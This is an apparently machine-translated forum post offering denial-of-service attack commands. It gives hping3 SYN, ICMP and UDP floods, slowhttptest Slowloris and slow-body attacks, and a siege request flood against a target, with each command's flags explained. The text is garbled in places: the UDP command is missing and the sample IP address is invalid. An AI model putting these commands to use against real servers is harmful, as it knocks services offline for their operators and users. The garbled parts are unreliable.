hping3 is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like
ping do with ICMP replies. Hping3 handles fragmentation, arbitrary packet body and size and can be used in order
to transfer files under supported protocols.
Hping3 can be used, among other things to: Test firewall rules, [spoofed] port scanning, test net performance
using differents protocols, packet size, TOS (type of service) and fragmentation, path MTU discovery, files
transferring even between really fascist firewall rules, traceroute like under different protocols, firewalk like usage,
remote OS fingerprint, TCP/IP stack auditing.
I will begin with an attack on the excess of the maximum number of half-open sessions ( the SYN-flood ):
hping3 –flood -S -p 80 113.432.421.2
options: -flood: send as many packages as possible.
-S: Use SYN packets
-p 80: packets sent to port 80 ( the HTTP ).
The second type of attack is the ICMP-flood . It is better to use, together with the large size of packages to try to exhaust entering the attacked server channel.
hping3 –flood –icmp -d 1000 dstIP
options: -icmp: using ICMP packets
-d 1000 – indicates the size of the package
Now let’s try the UDP-flood . This attack also saturates the bandwidth.
options: -udp: use the UDP
-s 53: the port 53
-keep: fix the port of departure, otherwise it will increase by 1 for each next package
-p 68 : send packets on port 68
Now for the attacks directly on the self Web server.
The first will be an attack on a slow connection. The meaning of this attack is that any Web server has a limit on the number of concurrent connections, but when i are connected and very slowly requested pages – the connection is not reset, and the number of concurrent connections the server is limited.
slowhttptest -c 1000 -H -i 20 -r 200 -t GET -u http://dstIP -x 24 -p 3
-c – the total sum of the number of connections
-i – pause between sessions for the loading of the page (in a single connection)
-r – the number of connections per second
-t GET – use GET requests (as can be the POST )
-u – the URL . Supports HTTP and HTTPS links
-x – the number of bytes downloaded from the page in a single session (as part of a single connection)
-p – timeout when checking the connection. If the server response is not received during this time, the server is considered
unavailable-H – attack slow headers aka Slowloris Also available types of attacks:-B – Attack slow body aka RU-Dead-Yet-R – attack range attack aka Apache killer – the X – attack Slow Read
And the last type considered attacks. Utility siege , which simply asks, in a huge number of streams, site pages, after which there is exhaustion of resources or server (if the requested heavy village) or outbound channel resources (if the requested heavy files).
siege -i -c 2000 https://dstIP/page
-i: to simulate a normal user
-c: the number of connections
page – requested page. type of attack depends on the selected page.
You can this utility to transfer the flag -R file listing pages
No system is truly secure!
You must be logged in to reply to this topic.